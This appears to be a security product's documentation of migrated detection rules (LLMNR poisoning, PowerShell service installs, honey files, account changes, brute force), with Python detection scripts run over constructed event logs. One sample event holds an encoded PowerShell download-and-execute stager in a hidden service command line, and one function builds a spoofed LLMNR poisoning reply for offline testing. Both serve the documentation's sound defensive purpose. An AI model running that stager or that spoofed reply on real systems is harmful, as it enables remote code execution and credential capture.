Migrated Legacy Rules

This is a collection of rules that have been migrated from the Legacy UBA Detection Rules tab.

Attacker Technique - Protocol Poisoning

Description

This detection identifies a host poisoning a name-resolution protocol such as LLMNR or NBT-NS: the host answers name queries it is not authoritative for, so that victims connect to it and expose credentials that can be captured or relayed.

Recommendation

Investigate the poisoning host. Search for additional hosts that may have queried the poisoning host, as this alert will only fire once per poisoner address per day.

MITRE ATT&CK Techniques

  • Adversary-in-the-Middle - T1557
  • LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001
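One practical way to find the poisoning host the recommendation asks about is an LLMNR canary: query the LLMNR multicast group for a name that cannot exist, and treat any answer as a poisoner. The script below is an added example, not part of this page's rule documentation and not the product's own detection logic. The multicast group and port come from RFC 4795; the packet layout follows the DNS header/question format that LLMNR reuses. `build_poisoned_response` is a constructed reply in the shape a poisoning tool sends, included only so the parser can be exercised offline; `run_canary` sends a real query and needs a LAN interface.

```python
"""LLMNR poisoning canary (added example, not the product's detection logic).
Query the LLMNR multicast group for a name that cannot exist on the network.
Nothing legitimate answers; any host that does is a poisoner."""
import random
import socket
import string
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # IPv4 group and port from RFC 4795
QTYPE_A, QCLASS_IN = 1, 1


def random_canary(length=12):
    """Throwaway hostname that no real resolver will know."""
    return "canary-" + "".join(random.choices(string.ascii_lowercase, k=length))

def encode_name(name):
    """DNS-style label encoding: <len><label>...<0x00>."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def build_llmnr_query(name, txid):
    """LLMNR reuses the DNS header and question layout: one A/IN question."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)

def _read_name(buf, off):
    """Decode a name (following compression pointers); return (name, next offset)."""
    labels, end, hops = [], None, 0
    while True:
        length = buf[off]
        if (length & 0xC0) == 0xC0:                         # compression pointer
            end = off + 2 if end is None else end
            off = struct.unpack(">H", buf[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(buf[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), (off if end is None else end)

def parse_llmnr_response(buf, expected_txid, canary):
    """Return [(name, ip)] for A answers to our canary; [] for anything else."""
    if len(buf) < 12:
        return []
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", buf[:12])
    if txid != expected_txid or not (flags & 0x8000) or an == 0:   # must be a reply
        return []
    off = 12
    for _ in range(qd):                                     # skip echoed question(s)
        _, off = _read_name(buf, off)
        off += 4
    hits = []
    for _ in range(an):
        name, off = _read_name(buf, off)
        rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", buf[off:off + 10])
        off += 10
        rdata, off = buf[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and (rclass & 0x7FFF) == QCLASS_IN and rdlen == 4 \
                and name.lower() == canary.lower():
            hits.append((name, socket.inet_ntoa(rdata)))
    return hits

def build_poisoned_response(query, spoofed_ip):
    """Constructed reply in the shape a poisoner sends; used for offline testing only."""
    name, _ = _read_name(query, 12)
    header = query[:2] + struct.pack(">HHHHH", 0x8000, 1, 1, 0, 0)
    answer = encode_name(name) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, 30, 4) \
        + socket.inet_aton(spoofed_ip)
    return header + query[12:] + answer

def run_canary(timeout=2.0):
    """Send one canary query on the wire and map each responder's source IP to the
    address it tried to hand us.  Needs a LAN interface; not exercised offline."""
    canary, txid = random_canary(), random.randrange(1, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
    poisoners = {}
    try:
        while True:
            data, (src, _) = sock.recvfrom(4096)
            for _name, ip in parse_llmnr_response(data, txid, canary):
                poisoners[src] = ip                         # src is the host to investigate
    except socket.timeout:
        pass
    finally:
        sock.close()
    return poisoners

if __name__ == "__main__":
    for src, ip in run_canary().items():
        print(f"LLMNR poisoner {src} answered the canary with {ip}")
```

The source address of the reply, not the address inside it, identifies the poisoner; a poisoner normally answers with its own address but nothing stops it from handing out another host's. Because the rule above fires once per poisoner address per day, a periodic canary run from a few vantage points is a cheap way to enumerate every victim subnet the poisoner can see.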

Attacker Technique - Service Installed Executing PowerShell

Description

This detection identifies services being installed with ‘powershell’ in the command line. Malicious actors use this technique to execute commands through a system service, which runs under the service account (commonly LocalSystem) rather than as the logged-on user.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Command and Scripting Interpreter - T1059
  • PowerShell - T1059.001
  • System Services - T1569
  • Service Execution - T1569.002

Attacker Technique - Service Installed With Long Command Line

Description

This detection identifies services being installed with an unusually long string in the command line. Malicious actors use this technique to execute commands through a system service; a long service command line often carries an encoded or inline payload rather than a path to a binary.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • System Services - T1569
  • Service Execution - T1569.002
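The two service-installation rules above (PowerShell in the command line, and a long command line) can be checked against service-install events with the same logic, so one added example covers both. It is not this page's rule text and not the product's detection logic. The events are constructed in the shape of a System-log 7045 record (`ServiceName`, `ImagePath`, `Computer`); the length threshold is an assumption to be tuned against a baseline of your own fleet. When the command line carries a PowerShell `-EncodedCommand` argument, the script also decodes it so the analyst can read the payload.

```python
"""Flag service installations whose command line launches PowerShell or is
unusually long (added example over constructed events; not the product's logic)."""
import base64
import re

LONG_CMDLINE_THRESHOLD = 200   # assumption: baseline your own fleet before tuning
POWERSHELL_RE = re.compile(r"(?:^|[\\/\s\"'])(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand is base64 of UTF-16LE; return the plaintext or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None

def analyse_service_install(event):
    """Return a finding for one 7045/4697-style event, or None if nothing matched."""
    cmdline = event.get("ImagePath", "")
    reasons = []
    if POWERSHELL_RE.search(cmdline):
        reasons.append("powershell")
    if len(cmdline) > LONG_CMDLINE_THRESHOLD:
        reasons.append("long_cmdline")
    if not reasons:
        return None
    return {
        "Computer": event.get("Computer"),
        "ServiceName": event.get("ServiceName"),
        "ImagePath": cmdline,
        "length": len(cmdline),
        "reasons": reasons,
        "decoded": decode_encoded_command(cmdline),
    }

def scan(events):
    return [f for f in map(analyse_service_install, events) if f]


# --- constructed sample events (System log 7045 shape); hosts and URL are made up ---
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "ws01", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7045, "Computer": "ws02", "ServiceName": "updater",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -enc " + _ENCODED},
    {"EventID": 7045, "Computer": "srv01", "ServiceName": "syncsvc",
     "ImagePath": "cmd.exe /c " + " & ".join(["ping -n 1 127.0.0.1"] * 20)},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["Computer"], f["ServiceName"], f["reasons"], f["decoded"])
```

The PowerShell pattern anchors on a path separator, whitespace or quote so that a binary merely containing the substring (for example a legitimate `powershellhelper.exe`) does not match on its own, and it also covers `pwsh`. Both indicators can fire on the same event, as the second sample shows.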

File Access - Honey File Accessed

Description

This detection identifies a user accessing a honey file. A honey file is a decoy file placed on a network file share that legitimate users have no reason to open. Honey files are designed to detect attackers who are accessing and potentially removing data from your network: attackers will often find a file share on a network, archive the contents of the share and exfiltrate the data for offline analysis, touching the decoy along with everything else.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
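The following is an added example of the honey-file check run over file-server object-access records, not part of this page and not the product's detection logic. The events are constructed in the shape of Security-log 4663 entries as the file server itself logs them, so the decoys are listed by their server-local paths rather than the UNC paths clients see (the share layout, the decoy names, the correlation window and the bulk-read threshold are all assumptions). Because the description says attackers archive whole shares, each alert also counts how many distinct files the same user touched on the same share around the decoy access, which separates a bulk copy from an accidental click.

```python
"""Honey-file access detection over file-server object-access events
(added example; constructed 4663-style records, not the product's rule logic)."""
from datetime import datetime, timedelta

# Assumption: decoy files as they appear in the file server's own audit log.
HONEY_FILES = {
    ("fs01", r"D:\Shares\Finance\2024_payroll_backup.xlsx"),
    ("fs01", r"D:\Shares\HR\executive_salaries.docx"),
}
CORRELATION_WINDOW = timedelta(minutes=5)   # assumption
BULK_READ_THRESHOLD = 20                    # distinct files in window; assumption


def norm_path(p):
    return p.replace("/", "\\").rstrip("\\").lower()

def share_root(p):
    """Top-level share folder, e.g. d:\\shares\\finance (assumed layout)."""
    return "\\".join(norm_path(p).split("\\")[:3])

def detect_honey_access(events):
    honey = {(c.lower(), norm_path(p)) for c, p in HONEY_FILES}
    rows = sorted(({**e, "ts": datetime.fromisoformat(e["TimeCreated"])} for e in events),
                  key=lambda e: e["ts"])
    alerts = []
    for e in rows:
        if (e["Computer"].lower(), norm_path(e["ObjectName"])) not in honey:
            continue
        root = share_root(e["ObjectName"])
        # Context for the analyst: what else did this user read on the share nearby?
        touched = {norm_path(o["ObjectName"]) for o in rows
                   if o["SubjectUserName"] == e["SubjectUserName"]
                   and o["Computer"] == e["Computer"]
                   and share_root(o["ObjectName"]) == root
                   and abs(o["ts"] - e["ts"]) <= CORRELATION_WINDOW}
        alerts.append({
            "user": e["SubjectUserName"], "host": e["Computer"],
            "honey_file": e["ObjectName"], "when": e["ts"].isoformat(),
            "files_in_window": len(touched),
            "bulk_read": len(touched) >= BULK_READ_THRESHOLD,
        })
    return alerts

def _evt(ts, user, path, host="fs01"):
    return {"EventID": 4663, "TimeCreated": ts.isoformat(), "Computer": host,
            "SubjectUserName": user, "ObjectName": path, "AccessMask": "0x1"}


# --- constructed sample: a normal user, a bulk copier, and an accidental click ---
_T0 = datetime(2024, 5, 6, 9, 0, 0)
SAMPLE_EVENTS = [_evt(_T0, "alice", r"D:\Shares\Finance\invoice_001.pdf")]
SAMPLE_EVENTS += [_evt(_T0 + timedelta(seconds=2 * i), "mallory",
                       r"D:\Shares\Finance\invoice_%03d.pdf" % i) for i in range(40)]
SAMPLE_EVENTS.append(_evt(_T0 + timedelta(seconds=41), "mallory",
                          r"D:\Shares\Finance\2024_payroll_backup.xlsx"))
SAMPLE_EVENTS.append(_evt(_T0 + timedelta(hours=3), "bob",
                          r"D:\Shares\Finance\2024_PAYROLL_BACKUP.xlsx"))

if __name__ == "__main__":
    for a in detect_honey_access(SAMPLE_EVENTS):
        print(a)
```

Paths are compared case-insensitively because NTFS is, and the decoy must be excluded from backup jobs, indexers and antivirus scans, or those service accounts will trip the rule. Honey-file events only exist if object-access auditing (a SACL on the decoy) is configured on the file server.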

Lateral Movement - Administrator Impersonation

Description

A user has authenticated to an administrator account.

Recommendation

Investigate the source user of this event to verify if this activity is benign or expected. If it is expected, exceptions can be added for the source user. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

MITRE ATT&CK Techniques

  • Valid Accounts - T1078
  • Domain Accounts - T1078.002

Lateral Movement - Watched User Impersonation

Description

A user has authenticated to a watched user’s account.

Recommendation

Investigate the source user of this event to verify if this activity is benign or expected. If it is expected, exceptions can be added for the source user. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

MITRE ATT&CK Techniques

  • Domain Accounts - T1078.002

User Behavior - An Attempt Was Made To Reset An Account’s Password

Description

An attempt was made to reset an account’s password.

Recommendation

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724#security-monitoring-recommendations

MITRE ATT&CK Techniques

  • Account Manipulation - T1098

User Behavior - A User Account Privilege Has Been Escalated

Description

An administrator has assigned a higher level of privileges to a user account, for example by adding it to a security-enabled local group such as Administrators.

Recommendation

Investigate the subject user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732#security-monitoring-recommendations

MITRE ATT&CK Techniques

  • Account Manipulation - T1098

User Behavior - A User Account Was Changed

Description

A user account was changed.

Recommendation

Investigate the subject user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738#security-monitoring-recommendations

MITRE ATT&CK Techniques

  • Account Manipulation - T1098

User Behavior - A User Account Was Created

Description

A new account has been created.

Recommendation

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720#security-monitoring-recommendations

User Behavior - A User Account Was Enabled

Description

A previously disabled user account has been re-enabled by an administrator.

Recommendation

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4722#security-monitoring-recommendations

MITRE ATT&CK Techniques

  • Account Manipulation - T1098

User Behavior - A User Account Was Locked Out

Description

An account has been locked.

Recommendation

Investigate the target user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4740#security-monitoring-recommendations

MITRE ATT&CK Techniques

  • Account Access Removal - T1531

User Behavior - A User Account Was Unlocked

Description

A previously locked user account has been unlocked by an administrator.

Recommendation

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4767#security-monitoring-recommendations
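The seven account-management rules above (password reset, privilege escalation, account changed, created, enabled, locked out, unlocked) each map one Security-log event ID to one alert. The added example below, which is not this page's text and not the product's detection logic, applies that mapping to constructed Security-log records and goes one step further than the per-event rules: it correlates an account creation (4720) with a later addition of the same new SID to a privileged local group (4732) by the same subject, a pattern worth a higher-severity alert than either event alone. The privileged group list and the correlation window are assumptions; the SIDs, hosts and user names are made up.

```python
"""Account-management audit events mapped to this page's 'User Behavior' rules, plus
one correlation the per-event rules do not make (added example over constructed
Security-log records; not the product's detection logic)."""
from datetime import datetime, timedelta

RULE_FOR_EVENT = {
    4724: "An Attempt Was Made To Reset An Account's Password",
    4732: "A User Account Privilege Has Been Escalated",
    4738: "A User Account Was Changed",
    4720: "A User Account Was Created",
    4722: "A User Account Was Enabled",
    4740: "A User Account Was Locked Out",
    4767: "A User Account Was Unlocked",
}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "backup operators"}  # assumption
CHAIN_WINDOW = timedelta(minutes=10)                                                # assumption


def triage(events):
    """Return (one alert per matching event, chain alerts).

    Chain: the subject who created an account (4720, keyed on the new TargetSid)
    adds that same SID (4732 MemberSid) to a privileged group within CHAIN_WINDOW.
    """
    singles, chains, created = [], [], {}
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        rule = RULE_FOR_EVENT.get(e["EventID"])
        if rule is None:
            continue
        ts = datetime.fromisoformat(e["TimeCreated"])
        singles.append({"rule": rule, "subject": e["SubjectUserName"],
                        "target": e["TargetUserName"], "computer": e["Computer"],
                        "when": ts.isoformat()})
        if e["EventID"] == 4720:
            created[e["TargetSid"]] = (ts, e)
        elif e["EventID"] == 4732 and e["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            hit = created.get(e.get("MemberSid"))
            if hit and hit[1]["SubjectUserName"] == e["SubjectUserName"] \
                    and ts - hit[0] <= CHAIN_WINDOW:
                chains.append({"rule": "New account added to privileged group by its creator",
                               "subject": e["SubjectUserName"], "account": hit[1]["TargetUserName"],
                               "group": e["TargetUserName"], "computer": e["Computer"],
                               "seconds_after_creation": int((ts - hit[0]).total_seconds())})
    return singles, chains

def _evt(ts, event_id, subject, target, computer="ws05", **extra):
    return {"EventID": event_id, "TimeCreated": ts.isoformat(), "SubjectUserName": subject,
            "TargetUserName": target, "Computer": computer, **extra}


# --- constructed sample: routine helpdesk provisioning, one suspicious chain, a lockout ---
_T0 = datetime(2024, 5, 6, 10, 0, 0)
_S = "S-1-5-21-1111111111-2222222222-3333333333-"
SAMPLE_EVENTS = [
    _evt(_T0, 4720, "helpdesk", "jsmith", TargetSid=_S + "1105"),
    _evt(_T0 + timedelta(seconds=5), 4722, "helpdesk", "jsmith", TargetSid=_S + "1105"),
    _evt(_T0 + timedelta(hours=4), 4720, "mallory", "svc_mon", TargetSid=_S + "1106"),
    _evt(_T0 + timedelta(hours=4, minutes=1), 4732, "mallory", "Administrators",
         TargetSid="S-1-5-32-544", MemberSid=_S + "1106"),
    _evt(_T0 + timedelta(hours=5), 4740, "DC01$", "bob", computer="dc01"),
    _evt(_T0 + timedelta(hours=6), 4732, "helpdesk", "Remote Desktop Users",
         TargetSid="S-1-5-32-555", MemberSid=_S + "1105"),   # 6 h later: outside window
]

if __name__ == "__main__":
    singles, chains = triage(SAMPLE_EVENTS)
    for a in singles + chains:
        print(a)
```

Matching on SIDs rather than names matters for 4732, where the member name field is frequently logged as "-"; the group appears in 4732's `TargetUserName`, not the member. The single-event alerts still go out unchanged, so the chain alert is additive rather than a replacement for the rules above.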

User Behavior - A virus has been found on an asset

Description

A virus has been found on an asset.

Recommendation

Review the file that generated the alert.

MITRE ATT&CK Techniques

  • Malicious File - T1204.002

User Behavior - An advanced malware system has generated an alert

Description

An advanced malware system has generated an alert.

Recommendation

Review the file or network traffic that generated the alert.

MITRE ATT&CK Techniques

  • Malware - T1588.001

User Behavior - Brute Force Against Domain Account

Description

A domain account has failed to authenticate to the same asset excessively.

Recommendation

Investigate the source asset and the targeted domain account of this event to verify whether this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4648#security-monitoring-recommendations

MITRE ATT&CK Techniques

  • Password Guessing - T1110.001
  • Password Spraying - T1110.003
  • Credential Stuffing - T1110.004

User Behavior - Brute Force Against Local Account

Description

A local account has failed to authenticate to the same asset excessively.

Recommendation

Investigate the source asset and the targeted local account of this event to verify whether this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4648#security-monitoring-recommendations

MITRE ATT&CK Techniques

  • Password Guessing - T1110.001
  • Password Spraying - T1110.003
  • Credential Stuffing - T1110.004
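The two brute-force rules above differ only in whether the targeted account is a domain or a local account. The added example below, which is not this page's text and not the product's detection logic, counts failed logons per (account, asset) in a sliding window and labels the alert with the matching rule name. The records are constructed in the shape of a Security-log 4625 failed-logon event (this page links the 4648 explicit-credential event for further reading; 4625 carries the target account, the asset and the source address needed here). The threshold and window are assumptions; the local-versus-domain test relies on Windows logging a local account's domain as the host's own name.

```python
"""Brute-force detection: excessive failed logons for one account against one
asset inside a sliding window, split into domain vs local account alerts
(added example over constructed failed-logon records; not the product's logic)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILURE_THRESHOLD = 10                 # assumption: tune per environment
WINDOW = timedelta(minutes=5)          # assumption


def is_local_account(target_domain, computer):
    """Windows logs a local account's domain as the host's own name ('.' or '' also
    mean the local SAM); anything else is a domain (or trusted-domain) account."""
    host = computer.split(".")[0].lower()
    return target_domain.lower() in {host, ".", ""}

def detect_brute_force(events):
    """Emit one alert per (account, asset) the first time the threshold is crossed
    within WINDOW; further failures in the same burst do not re-alert."""
    windows = defaultdict(deque)       # (domain\user, asset) -> recent failure times
    alerted, alerts = set(), []
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(e["TimeCreated"])
        key = (f'{e["TargetDomainName"]}\\{e["TargetUserName"]}'.lower(), e["Computer"].lower())
        q = windows[key]
        q.append(ts)
        while q and ts - q[0] > WINDOW:
            q.popleft()
        if len(q) >= FAILURE_THRESHOLD and key not in alerted:
            alerted.add(key)
            local = is_local_account(e["TargetDomainName"], e["Computer"])
            alerts.append({
                "rule": "Brute Force Against Local Account" if local
                        else "Brute Force Against Domain Account",
                "account": key[0], "asset": key[1],
                "source_ip": e.get("IpAddress"), "failures_in_window": len(q),
                "first": q[0].isoformat(), "last": ts.isoformat(),
            })
        elif len(q) < FAILURE_THRESHOLD // 2:
            alerted.discard(key)       # burst has died down; allow a fresh alert later
    return alerts

def _fail(ts, user, domain, computer, ip):
    return {"EventID": 4625, "TimeCreated": ts.isoformat(), "TargetUserName": user,
            "TargetDomainName": domain, "Computer": computer, "IpAddress": ip,
            "Status": "0xC000006D"}


# --- constructed sample: one domain account and one local account under attack,
#     plus a user mistyping a password a few times ---
_T0 = datetime(2024, 5, 6, 2, 0, 0)
SAMPLE_EVENTS = (
    [_fail(_T0 + timedelta(seconds=3 * i), "svc_backup", "CORP", "srv01.corp.local", "10.0.0.9")
     for i in range(12)]
    + [_fail(_T0 + timedelta(seconds=5 * i), "Administrator", "SRV02", "srv02.corp.local", "10.0.0.9")
       for i in range(10)]
    + [_fail(_T0 + timedelta(minutes=i), "alice", "CORP", "ws07.corp.local", "10.0.0.31")
       for i in range(3)]
)

if __name__ == "__main__":
    for a in detect_brute_force(SAMPLE_EVENTS):
        print(a)
```

Keying on (account, asset) is what makes these two rules distinct from password spraying, where the count that matters is distinct accounts per source; the `source_ip` field in the alert is what the recommendation's "investigate the source" step needs.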

User Behavior - Exploit Mitigation has generated an alert

Description

An exploit has been mitigated in a process.

Recommendation

Investigate the process that was mitigated and verify if this activity is benign or expected. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Application or System Exploitation - T1499.004